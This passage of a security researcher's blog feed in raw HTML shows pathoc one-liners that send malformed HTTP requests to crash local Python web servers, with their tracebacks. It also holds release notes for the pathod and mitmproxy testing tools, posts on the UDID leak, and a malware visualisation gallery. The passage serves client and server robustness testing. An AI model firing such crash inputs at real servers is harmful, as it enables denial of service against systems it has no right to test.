callWithContext</span></span> <span class="giallo-l"><span> return context.call({ILogContext: newCtx}, func, *args, **kw)</span></span> <span class="giallo-l"><span> File &quot;twisted/python/context.py&quot;, line 118, in callWithContext</span></span> <span class="giallo-l"><span> return self.currentContext().callWithContext(ctx, func, *args, **kw)</span></span> <span class="giallo-l"><span> File &quot;twisted/python/context.py&quot;, line 81, in callWithContext</span></span> <span class="giallo-l"><span> return func(*args,**kw)</span></span> <span class="giallo-l"><span> --- &lt;exception caught here&gt; ---</span></span> <span class="giallo-l"><span> File &quot;twisted/internet/selectreactor.py&quot;, line 150, in _doReadOrWrite</span></span> <span class="giallo-l"><span> why = getattr(selectable, method)()</span></span> <span class="giallo-l"><span> File &quot;twisted/internet/tcp.py&quot;, line 199, in doRead</span></span> <span class="giallo-l"><span> rval = self.protocol.dataReceived(data)</span></span> <span class="giallo-l"><span> File &quot;twisted/protocols/basic.py&quot;, line 564, in dataReceived</span></span> <span class="giallo-l"><span> why = self.lineReceived(line)</span></span> <span class="giallo-l"><span> File &quot;twisted/web/http.py&quot;, line 1558, in lineReceived</span></span> <span class="giallo-l"><span> self.headerReceived(self.__header)</span></span> <span class="giallo-l"><span> File &quot;twisted/web/http.py&quot;, line 1580, in headerReceived</span></span> <span class="giallo-l"><span> self.length = int(data)</span></span> <span class="giallo-l"><span> exceptions.ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span></code></pre><h2 id="simplehttp">SimpleHTTP</h2> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:&quot;/\0&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>Exception happened during processing of request from (&#39;127.0.0.1&#39;, 54029)</span></span> <span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 284, in _handle_request_noblock</span></span> <span class="giallo-l"><span> self.process_request(request, client_address)</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 310, in process_request</span></span> <span class="giallo-l"><span> self.finish_request(request, client_address)</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 323, in finish_request</span></span> <span class="giallo-l"><span> self.RequestHandlerClass(request, client_address, self)</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 638, in __init__</span></span> <span class="giallo-l"><span> self.handle()</span></span> <span class="giallo-l"><span> File &quot;python2.7/BaseHTTPServer.py&quot;, line 340, in handle</span></span> <span class="giallo-l"><span> self.handle_one_request()</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/BaseHTTPServer.py&quot;, line 328, in handle_one_request</span></span> <span class="giallo-l"><span> method()</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SimpleHTTPServer.py&quot;, line 44, in do_GET</span></span> <span class="giallo-l"><span> f = self.send_head()</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SimpleHTTPServer.py&quot;, line 68, in send_head</span></span> <span class="giallo-l"><span> if os.path.isdir(path):</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/genericpath.py&quot;, line 41, in isdir</span></span> <span class="giallo-l"><span> st = os.stat(s)</span></span> <span class="giallo-l"><span>TypeError: must be encoded string without NULL bytes, not str</span></span></code></pre><h3 id="waitress">Waitress</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:i16,&quot; &quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>ERROR:waitress:uncaptured python exception, closing channel</span></span> <span class="giallo-l"><span>&lt;waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310&gt;</span></span> <span class="giallo-l"><span>(</span></span> <span class="giallo-l"><span> &lt;type &#39;exceptions.IndexError&#39;&gt;:list index out of range</span></span> <span class="giallo-l"><span> [lib/python2.7/asyncore.py|read|83]</span></span> <span class="giallo-l"><span> [lib/python2.7/asyncore.py|handle_read_event|444]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/channel.py|handle_read|169]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/channel.py|received|186]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/parser.py|received|99]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/parser.py|parse_header|158]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/parser.py|get_header_lines|247]</span></span> <span class="giallo-l"><span>)</span></span></code></pre> <p><strong>Edit: The first version of this post had examples that were due to the test WSGI application, not waitress. I've replaced them with the traceback above, which has been reformatted for clarity.</strong></p> <h3 id="werkzeug">Werkzeug</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:h&quot;Host&quot;=&quot;n\r\0&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;flask/app.py&quot;, line 1518, in __call__</span></span> <span class="giallo-l"><span> return self.wsgi_app(environ, start_response)</span></span> <span class="giallo-l"><span> File &quot;flask/app.py&quot;, line 1507, in wsgi_app</span></span> <span class="giallo-l"><span> return response(environ, start_response)</span></span> <span class="giallo-l"><span> File &quot;/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.py&quot;, line 1082, in __call__</span></span> <span class="giallo-l"><span> app_iter, status, headers = self.get_wsgi_response(environ)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/wrappers.py&quot;, line 1070, in get_wsgi_response</span></span> <span class="giallo-l"><span> headers = self.get_wsgi_headers(environ)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/wrappers.py&quot;, line 986, in get_wsgi_headers</span></span> <span class="giallo-l"><span> headers[&#39;Location&#39;] = location</span></span> <span class="giallo-l"><span> File &quot;werkzeug/datastructures.py&quot;, line 1132, in __setitem__</span></span> <span class="giallo-l"><span> self.set(key, value)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/datastructures.py&quot;, line 1097, in set</span></span> <span class="giallo-l"><span> self._validate_value(_value)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/datastructures.py&quot;, line 1065, in _validate_value</span></span> <span class="giallo-l"><span> raise ValueError(&#39;Detected newline in header value. This is &#39;</span></span> <span class="giallo-l"><span>ValueError: Detected newline in header value. This is a potential security problem</span></span></code></pre> Limits of data visualization with space filling curves 2012-09-20T00:00:00+00:00 2012-09-20T00:00:00+00:00 https://corte.si/posts/visualisation/hilbert-snake/ <p>I recently wrote a <a href="https://corte.si/posts/visualisation/binvis/">series</a> of <a href="https://corte.si/posts/visualisation/entropy/">posts</a> using the <a href="https://corte.si/posts/code/hilbert/portrait/">Hilbert curve</a> to visualize binaries, culminating in a <a href="https://corte.si/posts/visualisation/malware/">gallery showing regions of high entropy in malware</a>.</p> <div class="media"> <a href="..&#x2F;malware&#x2F;08b983ec55bfd50d1d2cb9a90b1ae54e.html"> <img src="malwarexample.png" /> </a> </div> <p>The fact that the Hilbert curve has excellent locality preservation means that one dimensional features are preserved (as much as they can be) in the two-dimensional layout. This lets us visually pick out features of interest, and makes it possible, for instance, to quickly identify different malware packers just based on their layout characteristics.</p> <p>An obvious next step is to ask if it's possible to extend this idea to let us visually compare binaries, creating a sort of visual diff. Unfortunately, we now bump our heads against the limitations of space-filling curve visualization. I made the animation below after a recent conversation along these lines, and I think it illustrates the main issues nicely. It shows a single contiguous stretch of data (the black area) being shifted progressively through a binary. At each timestep, the only thing that changes is the starting location of the data block:</p> <div class="media"> <a href="hilbertsnake.gif"> <img src="hilbertsnake.gif" /> </a> </div> <p>Two things are immediately clear:</p> <ul> <li>The block of data doesn't retain its shape at different offsets - identical stretches of data can look totally different depending on their locations.</li> <li>There's no way to quickly see <em>where</em> in the binary a piece of information lies. Unless you are very familiar with the particular curve and know its exact orientation, you can't say, for instance, when the data block lies a third of the way through the binary.</li> </ul> <p>It's often worthwhile to trade off these things for locality preservation, but it definitely scotches certain use cases. I do wonder if it might be possible to tune the trade-off somewhat - sacrificing some locality preservation for better shape retention and offset estimation. I've toyed with some ideas along these lines (see the unrolled layouts in the <a href="https://corte.si/posts/visualisation/binvis/">binary visualization post</a>), but I still don't have a satisfying solution. If anyone out there knows of one, drop me a line.</p> Findng the UDID leak: a guessing game 2012-09-07T00:00:00+00:00 2012-09-07T00:00:00+00:00 https://corte.si/posts/security/udid-leak-guessing/ <p>It's become quite a popular parlor game to guess who is responsible for the recent Antisec UDID leak. I've now seen no less than six separate apps named as the probable source (two of which came from <a rel="external" href="http://www.marco.org">Marco Arment</a>). Before we pick the next culprit, I think it's worth taking a step back to consider the list of things we <em>don't</em> know:</p> <ul> <li>We don't know that we're dealing with just one source. The Antisec dump may well be an amalgam of data from various sources.</li> <li>We don't know that we're looking for just one app, or even a set of apps by one developer. The leak may well come from one of the myriad of 3rd party services which could be included in thousands of apps.</li> <li>We don't know that Antisec is being truthful about the scale of the database, or the additional data they claim is associated with the UDID/APNS records.</li> <li>We certainly don't know that the data was filched from an FBI laptop or that the NCFTA was in any way involved.</li> </ul> <p>Given all of these unknowns, I think a simple process-of-elimination approach to tracking down the leak will probably be fruitless, or worse, result in the finger being pointed at even more innocent parties. The one entity that may already have the answer to this question is Apple. They have a list of a million affected UDIDs, and they presumably have records of all apps that have ever used the associated push tokens. Given a large and precise sample like this, it should be possible to find the origin(s) of the leak reasonably easily. Indeed, if Apple is on the ball they may already have done this.</p> <p>Now for some frank speculation of my own. Let's assume for a moment that Antisec has been entirely truthful about the data, and that we're dealing with a single source. In that case, we're looking for:</p> <ul> <li>... an app or third-party service integrated into multiple apps</li> <li>... with 12 million or more users</li> <li>... that is APNS-enabled</li> <li>... which also gathers user data like real names and zip codes.</li> </ul> <p>I'll throw my hat in the ring and say that my money is on a third-party service, not a single app. If my hunch is right, the list of possible culprits is actually rather short.</p> The UDID leak is a privacy catastrophe 2012-09-04T00:00:00+00:00 2012-09-04T00:00:00+00:00 https://corte.si/posts/security/udid-leak/ <p>Something I've been worrying about for a long time has just happened: <a rel="external" href="http://pastebin.com/nfVT7b0Z">Antisec has leaked a database with more than a million UDIDs</a>. The UDID issue has been a bit of a white whale of mine - I've written many blog posts about it and spent more hours than I care to think negotiating responsible disclosure with companies misusing UDIDs. Let's recap some of the posts I've written about this:</p> <ul> <li><a rel="external" href="http://corte.si/posts/security/openfeint-udid-deanonymization/index.html">In May 2011</a>, just before its sale to Gree was announced, I showed that <a rel="external" href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a> was misusing UDIDs in a way that allowed you to link a UDID to a user's identity, geolocation and Facebook and Twitter accounts. I didn't discuss it openly at the time, you could also completely take over an OpenFeint account, and access chat, forums, friends lists, and more using just a UDID. This resulted in a class-action lawsuit against OpenFeint, which has since petered out.</li> <li><a rel="external" href="http://corte.si/posts/security/apple-udid-survey/index.html">Later that month</a>, I published a survey looking at how UDIDs are used in practice. The data is now slightly out of date, but shows just how widely UDIDs are used and misused.</li> <li><a rel="external" href="http://corte.si/posts/security/udid-must-die/index.html">In September 2011</a>, I published the most troubling news so far, which paradoxically also got the least coverage in the press. I looked at <em>all</em> the gaming social networks on IOS - basically OpenFeint and its competitors - and found catastrophic mismanagement by nearly everyone. The vulnerabilities ranged from de-anonymization, to takeover of the user's gaming social network account, to the ability to completely take over the user's Facebook and Twitter accounts using just a UDID.</li> </ul> <p>As serious these problems are, I'm afraid it's just the tip of the iceberg. Negotiating disclosure and trying to convince companies to fix their problems has taken literally months of my time, so I've stopped publishing on this issue for the moment. It's disheartening to say it, but some of the companies mentioned in my posts <em>still</em> have unfixed problems (they were all notified well in advance of any publication). I will also note ominously that I know of a number of similar vulnerabilities elsewhere in the IOS app ecosystem that I've just not had the time to pursue.</p> <p>When speaking to people about this, I've often been asked "What's the worst that can happen?". My response was always that the worst case scenario would be if a large database of UDIDs leaked... and here we are.</p> Defiler 2012-08-26T00:00:00+00:00 2012-08-26T00:00:00+00:00 https://corte.si/posts/photos/lymantriid/ <p>I've been living out of a bag for the last 3 weeks, working hard on a series of intense but fun audits. After running in high gear for a while I find that I need a mental palate cleanser - something to help me refocus and stop me from getting snowblind. I then grab my camera, strap on my macro rig, and walk out the door to try to catch the local wildlife in the act. It's become a bit of a game - the aim is to catch creatures in their natural setting and leave them completely undisturbed when I go, with no posing, prodding or other disturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in the wind is a fun challenge.</p> <p>Today I find myself in Sydney, working in a part of the town that is shot through with unreasonably beautiful walking tracks. The place is also blessed with a huge diversity of invertebrate life that makes my <a rel="external" href="http://en.wikipedia.org/wiki/Dunedin">adopted home town</a> seem barren by comparison. I walked along a nearby track until I found a quiet, leafy spot, geared up, and leopard-crawled through the underbrush. Not long after, I came face-to-face with this imposing little chap sitting on the tip of a fern frond.</p> <div class="media"> <a href=".&#x2F;lymantriid2.jpg"> <img src=".&#x2F;lymantriid2.jpg" /> </a> </div> <p>This is a <a rel="external" href="http://en.wikipedia.org/wiki/Lymantriidae">Lymantriid</a> caterpillar of some variety, probably one of the tussock moths native to Australia. "Lymantria" means "defiler" - some species of this family can cause huge damage to foliage, and are considered to be destructive pests. So much so, that when a single male <a rel="external" href="http://en.wikipedia.org/wiki/Gypsy_moth">Gypsy Moth</a> (Lymantria dispar) was discovered in Hamilton, New Zealand, they sprayed the entire city with a caterpillar-specific <a rel="external" href="http://www.biosecurity.govt.nz/pests-diseases/forests/gypsy-moth/residents/foray.htm">bacterial insecticide</a>.</p> <p>No need for drastic measures with this particular fellow, though - he's native to this ecosystem, and the only pest is me and my camera. He was head down munching away when I found him, and paid absolutely no attention to me when I moved in close to get these shots. He's got reason to be cocksure, too - those tufts of hair on his back contain hollow, poison-filled spines that can cause a pretty unpleasant reaction when touched.</p> <div class="media"> <a href=".&#x2F;lymantriid1.jpg"> <img src=".&#x2F;lymantriid1.jpg" /> </a> </div> <p>An few hours exploring and photographing is a very effective brain-cleaner, leaving me ready to deal with spiny, venomous defilers of the digital variety.</p> pathod 0.2: the daemon gets an evil twin 2012-08-22T00:00:00+00:00 2012-08-22T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_2/ <p>I've just pushed pathod 0.2 out the door. This is a huge release, with many new features:</p> <ul> <li><a rel="external" href="http://pathod.net/docs/pathoc">pathoc</a>, pathod's evil client-side twin.</li> <li><a rel="external" href="http://pathod.net/docs/test">libpathod.test</a>, a framework for using pathod in your unit tests.</li> <li><a rel="external" href="http://pathod.net/docs/language">Improved mini language</a>, including many new abilities and improvements.</li> <li>A rewrite of the networking core.</li> </ul> <p>The project also has a new website at <a rel="external" href="http://pathod.net">pathod.net</a>. Yes, pathod is now self-hosting, so you can try out both pathod and pathoc specifications right on the website. There's also a new <a rel="external" href="http://public.pathod.net/200:b%22hello,%20sailor.%22">public pathod instance</a>, which I'm sure everyone will use entirely responsibly.</p> Introducing pathod: a pathological HTTP server 2012-05-01T00:00:00+00:00 2012-05-01T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_1/ <p>I've just released <a rel="external" href="http://cortesi.github.com/pathod%22">pathod</a>, a pathological HTTP/S daemon useful for testing and torturing HTTP clients. At its core is a tiny, terse language for crafting HTTP responses. It also has a built-in web interface that lets you play with the response spec language, inspect logs, and access pathod's full help document.</p> <p>The rest of this post is a quick teaser showing some of pathod's abilities. See the detailed documentation on the <a rel="external" href="http://cortesi.github.com/pathod%22">pathod site</a> if you want more.</p> <h2 id="the-simplest-possible-response">The simplest possible response</h2> <p>The easiest way to craft a response is to specify it directly in the request URL. Lets start with the simplest possible example. Start pathod, and then visit this URL:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://localhost:9999/p/200</span></span></code></pre> <p>The "/p/" path is the location of the response generator in pathod's default configuration - everything after that a response specification in pathod's mini-language. The general form of a response spec is as follows:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>code[MESSAGE]:[colon-separated list of features]</span></span></code></pre> <p>In this case, we're specifying only the HTTP response code - that is, an HTTP 200 OK with no headers and no content, resulting in a response like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>HTTP/1.1 200 OK</span></span></code></pre><h2 id="specifying-features">Specifying features</h2> <p>One example of a "feature" is a response header. Lets embellish our response by adding one:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>200:h&quot;Etag&quot;=&quot;foo&quot;</span></span></code></pre> <p>The first letter of the feature - "h", in this case - is a mnemonic indicating the type of feature we're adding. The full response to this spec looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>HTTP/1.1 200 OK</span></span> <span class="giallo-l"><span>Etag: foo</span></span></code></pre> <p>Both "Etag" and "foo" are Value Specifiers, a syntax used throughout the response specification language. In this case they are literal values, as indicated by the fact that they are quoted strings. The Value Specification syntax also lets us load values from files or generate random data. For instance, here is a specification that generates 100k of random binary data for the header value:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>200:h&quot;Etag&quot;=@100k</span></span></code></pre> <p>Now, binary data in the header value will probably break things in interesting ways, but is unlikely to be read by the client as a valid (but over-long) value. To see if the client really drops off its perch if we feed it a single 100k header, we have to constrain the random data. Here's the same response, but with data generated only from ASCII letters:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>200:h&quot;Etag&quot;=@100k,ascii_letters</span></span></code></pre> <p>pathod has a large number of built-in character classes from which random data can be generated.</p> <h2 id="pauses-and-disconnects">Pauses and Disconnects</h2> <p>Next, we can disrupt the communications in various ways. At the moment, this means adding pauses and disconnects to a response. Let's start with an HTTP 404 response with a body consisting of a 100k of random binary data:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k</span></span></code></pre> <p>Here's the same response, but with a 120 second pause after sending 100 bytes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k:p120,100</span></span></code></pre> <p>And, the same response again, but with hard disconnect after sending 100 bytes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k:d100</span></span></code></pre> <p>Instead of specifying a time explicitly, we can ask pathod to just randomly disconnect at a time of its choosing:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k:dr</span></span></code></pre> <p>That's it for the teaser - hopefully it's enough to entice you into looking at <a rel="external" href="http://cortesi.github.com/pathod%22">pathod</a>'s full documentation.</p> <h2 id="what-s-next">What's next?</h2> <p>pathod is an "airport project" - the first draft was written in its entirety during a 40-hour trip back home from New York (I drew a bad lot in stopovers). I've now firmed it up a bit, but there's still work to be done. In the next month, mitmproxy's test suite will move to pathod, after which there will be a simple, well-documented way to unit test. I also plan to build out the JSON API (which is used to drive pathod in test suites), and expand the mini-language with convenient ways to generate pathological cookies, authentication headers, SSL errors, and cache control.</p> mitmproxy 0.8 2012-04-09T00:00:00+00:00 2012-04-09T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_8/ <div class="media"> <a href="mitmproxy_0_8.png"> <img src="mitmproxy_0_8.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.8</a>. This release has a few major new features, big speedups, and many, many small bugfixes and improvements. Here are the headlines:</p> <h2 id="android-interception">Android interception</h2> <p>The most prominent new feature is that we now have a supported way to intercept Android traffic. What's more, we can do this without a cumbersome transparent proxying rig - see the <a rel="external" href="http://mitmproxy.org/doc/certinstall/android.html">Android section in the documentation</a> for the details. Special thanks goes to <a rel="external" href="http://twitter.com/yjmbo">Jim Cheetham</a> for lending me an Android device and helping to get this feature off the ground.</p> <h2 id="replacement-patterns">Replacement patterns</h2> <p>Another exceedingly useful new feature is <a rel="external" href="http://mitmproxy.org/doc/replacements.html">replacement patterns</a>. These consist of a filter, a regular expression and a replacement string, and run continuously while mitmproxy processes requests and responses. You can pass these either on the command-line, or using a built-in replacement pattern editor.</p> <div class="media"> <a href="mitmproxy0_8_replace.png"> <img src="mitmproxy0_8_replace.png" /> </a> </div> <p>I'm sure you can immediately think of many uses for this flexible feature, but my favourite is to use it during testing as a way to conveniently inject complicated exploits into web traffic. I do this by setting a replacement pattern that swaps a short but likely unique string (say MYXSS) for a long exploit, and then I use simple interaction and front-end tools like Firebug to inject exploits into requests manually based on the short string marker.</p> <h2 id="improved-pretty-printing-of-request-and-response-contents">Improved pretty-printing of request and response contents</h2> <p>This release of mitmproxy has a completely redesigned subsystem for pretty-printing request and response bodies. For instance, we now extract EXIF tags and other basic information to give you something better than a hex dump when looking at an image:</p> <div class="media"> <a href="mitmproxy0_8-pretty.png"> <img src="mitmproxy0_8-pretty.png" /> </a> </div> <p>We also have much improved HTML indenting (using <a rel="external" href="http://lxml.de/">lxml</a>), and a built-in JavaScript beautifier (thanks to <a rel="external" href="http://jsbeautifier.org">JSBeautifier</a>) that teases out compressed and obfuscated scripts into something readable.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Detailed tutorial for Android interception. Some features that land in this release have finally made reliable Android interception possible.</li> <li>Upstream-cert mode, which uses information from the upstream server to generate interception certificates.</li> <li>Replacement patterns that let you easily do global replacements in flows matching filter patterns. Can be specified on the command-line, or edited interactively.</li> <li>Much more sophisticated and usable pretty printing of request bodies. Support for auto-indentation of JavaScript, inspection of image EXIF data, and more.</li> <li>Details view for flows, showing connection and SSL cert information (X keyboard shortcut).</li> <li>Server certificates are now stored and serialized in saved traffic for later analysis. This means that the 0.8 serialization format is NOT compatible with 0.7.</li> <li>Add a shortcut key ("f") to load the remainder of a request or response body, if it is abbreviated.</li> <li>Many other improvements, including bugfixes, and expanded scripting API, and more sophisticated certificate handling.</li> </ul> mitmproxy 0.7 2012-02-27T00:00:00+00:00 2012-02-27T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_7/ <div class="media"> <a href="mitmproxy_0_7.png"> <img src="mitmproxy_0_7.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.7</a>. The biggest visible change is a new structured editor for headers, query strings and form fields. Other new feature include a reverse proxy mode, extended script API that makes many common tasks much easier, and a myriad of improvements to the interface (including a massive increase in speed). Everybody still on 0.6 should upgrade - get it here:</p> <h2 id="mitmproxy-0-7-tar-gz-docs"><a rel="external" href="http://mitmproxy.org">mitmproxy-0.7.tar.gz</a> <a rel="external" href="http://mitmproxy.org/docs">(docs)</a></h2> <p>You can also now install mitmproxy using <a rel="external" href="http://pypi.python.org/pypi/pip">pip</a>, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;"> pip</span><span style="color: #032F62;"> install mitmproxy</span></span></code></pre> <p>In other news, the project has had an amazing month, after a rash of high-profile results obtained using mitmproxy were published. It started with <a rel="external" href="http://mclov.in/2012/02/08/path-uploads-your-entire-address-book-to-their-servers.html">Arun Thampi's discovery</a> that Path uploads users' address books to their servers. Things snowballed from there, and for a few days mitmproxy seemed to be everywhere. Similar findings were made for <a rel="external" href="http://markchang.tumblr.com/post/17244167951/hipster-uploads-part-of-your-iphone-address-book-to-its">Hipster</a>, <a rel="external" href="http://www.theverge.com/2012/2/14/2798008/ios-apps-and-the-address-book-what-you-need-to-know">The Verge</a> did a mitmproxy-driven AddressbookGate expose (including vaguely threatening background shots of mitmproxy doing its dastardly work), and lots of people said nice things on Twitter.</p> <p>To see the impact all of this for the mitmproxy project, you need only look at the <a rel="external" href="http://github.com/cortesi/mitmproxy">Github page</a> - watchers of the repo went from about 200 a month a go, to 950 at the time of this post.</p> <h2 id="changelog">Changelog</h2> <ul> <li>New built-in key/value editor. This lets you interactively edit URL query strings, headers and URL-encoded form data.</li> <li>Extend script API to allow duplication and replay of flows.</li> <li>API for easy manipulation of URL-encoded forms and query strings.</li> <li>Add "D" shortcut in mitmproxy to duplicate a flow.</li> <li>Reverse proxy mode. In this mode mitmproxy acts as an HTTP server, forwarding all traffic to a specified upstream server.</li> <li>UI improvements - use Unicode characters to make GUI more compact, improve spacing and layout throughout.</li> <li>Add support for filtering by HTTP method.</li> <li>Add the ability to specify an HTTP body size limit.</li> <li>Move to typed netstrings for serialization format - this makes 0.7 backwards-incompatible with serialized data from 0.6!</li> <li>Significant improvements in speed and responsiveness of UI.</li> <li>Many minor bugfixes and improvements.</li> </ul> OpenBSD in decline? 2012-02-26T00:00:00+00:00 2012-02-26T00:00:00+00:00 https://corte.si/posts/security/openbsd-decline/ <p>My leisurely Sunday activity today is to set up a new <a rel="external" href="http://openbsd.org">OpenBSD</a> firewall for my mobile app testing lab. I haven't done a from-scratch OpenBSD install for years, so I spent some time reading through the change logs for the last few versions to catch up with what's changed. Although the project is clearly still making steady, well-engineered progress, I had the nagging feeling that the rate of change wasn't what it used to be. So, I pulled some numbers from <a rel="external" href="http://archives.neohapsis.com/archives/openbsd/cvs/">CVS commit message list archives</a>, and graphed them. Here are the number of commits per month from January 2001 to January 2012. The orange line is a simple 12-month moving average:</p> <div class="media"> <a href="commitspermonth.png"> <img src="commitspermonth.png" /> </a> </div> <p>Now, we should be cautious about interpreting this - the number of commits doesn't tell us anything about the quality, importance or magnitude of code change. Even if it did all of these things, there are other and perhaps better measures of a project's health. Still, the trend is clear, and suggests a sustained decline in activity.</p> <p>I just <a rel="external" href="http://openbsd.org/orders.html">bought some T-shirts</a> to help support one of my favourite open source projects. You should too.</p> Malware 2012-01-05T00:00:00+00:00 2012-01-05T00:00:00+00:00 https://corte.si/posts/visualisation/malware/ <p><b>Edit: Since this post, I've created an interactive tool for binary visualisation - see it at <a rel="external" href="http://binvis.io">binvis.io</a></b></p> <p>Hover and click for more.</p> <style> .malware { } .malware tr { border: 0; } .malware td { border: 0; position: relative; margin: 0 auto; width: 128px; height: 138px; } .malware td img { position: absolute; top:0; left:0; overflow: hidden; height: 128px; width: 128px; } .malware td .entropy { z-index: 9999; transition: opacity .3s linear; cursor: pointer; } .malware td :hover > .entropy { opacity: 0; } </style> <table class="malware"> <tr> <td> <a href="0cc9e0ba6a0bd8b79aaf2be22c496228.html"> <img class="entropy" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_entropy.png'/> <img class="charclass" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_charclass.png'/> </a> </td> <td> <a href="0dcfe476fbd68148f007e6c48c226e0f.html"> <img class="entropy" src='small_0dcfe476fbd68148f007e6c48c226e0f_entropy.png'/> <img class="charclass" src='small_0dcfe476fbd68148f007e6c48c226e0f_charclass.png'/> </a> </td> <td> <a href="03b3f30aed5b7dc39bd6e356bbde3713.html"> <img class="entropy" src='small_03b3f30aed5b7dc39bd6e356bbde3713_entropy.png'/> <img class="charclass" src='small_03b3f30aed5b7dc39bd6e356bbde3713_charclass.png'/> </a> </td> <td> <a href="131f1cb94df6e2969ac874503cbfd934.html"> <img class="entropy" src='small_131f1cb94df6e2969ac874503cbfd934_entropy.png'/> <img class="charclass" src='small_131f1cb94df6e2969ac874503cbfd934_charclass.png'/> </a> </td> <td> <a href="038e3a7add116ac69e5f9539ce461386.html"> <img class="entropy" src='small_038e3a7add116ac69e5f9539ce461386_entropy.png'/> <img class="charclass" src='small_038e3a7add116ac69e5f9539ce461386_charclass.png'/> </a> </td> </tr><tr> <td> <a href="094fedd2e4c175cd81dc170fd4d03917.html"> <img class="entropy" src='small_094fedd2e4c175cd81dc170fd4d03917_entropy.png'/> <img class="charclass" src='small_094fedd2e4c175cd81dc170fd4d03917_charclass.png'/> </a> </td> <td> <a href="1a30184661ee6585f4a188107e63a4d2.html"> <img class="entropy" src='small_1a30184661ee6585f4a188107e63a4d2_entropy.png'/> <img class="charclass" src='small_1a30184661ee6585f4a188107e63a4d2_charclass.png'/> </a> </td> <td> <a href="1b5bad65f8b72a52cfcae67e3e538f34.html"> <img class="entropy" src='small_1b5bad65f8b72a52cfcae67e3e538f34_entropy.png'/> <img class="charclass" src='small_1b5bad65f8b72a52cfcae67e3e538f34_charclass.png'/> </a> </td> <td> <a href="163524fb9a41e6ec79178a902797f8f1.html"> <img class="entropy" src='small_163524fb9a41e6ec79178a902797f8f1_entropy.png'/> <img class="charclass" src='small_163524fb9a41e6ec79178a902797f8f1_charclass.png'/> </a> </td> <td> <a href="177827ae9615791e067b4a9fb4be1ab9.html"> <img class="entropy" src='small_177827ae9615791e067b4a9fb4be1ab9_entropy.png'/> <img class="charclass" src='small_177827ae9615791e067b4a9fb4be1ab9_charclass.png'/> </a> </td> </tr><tr> <td> <a href="1b0e377994cfdb4eec0d2fb028118844.html"> <img class="entropy" src='small_1b0e377994cfdb4eec0d2fb028118844_entropy.png'/> <img 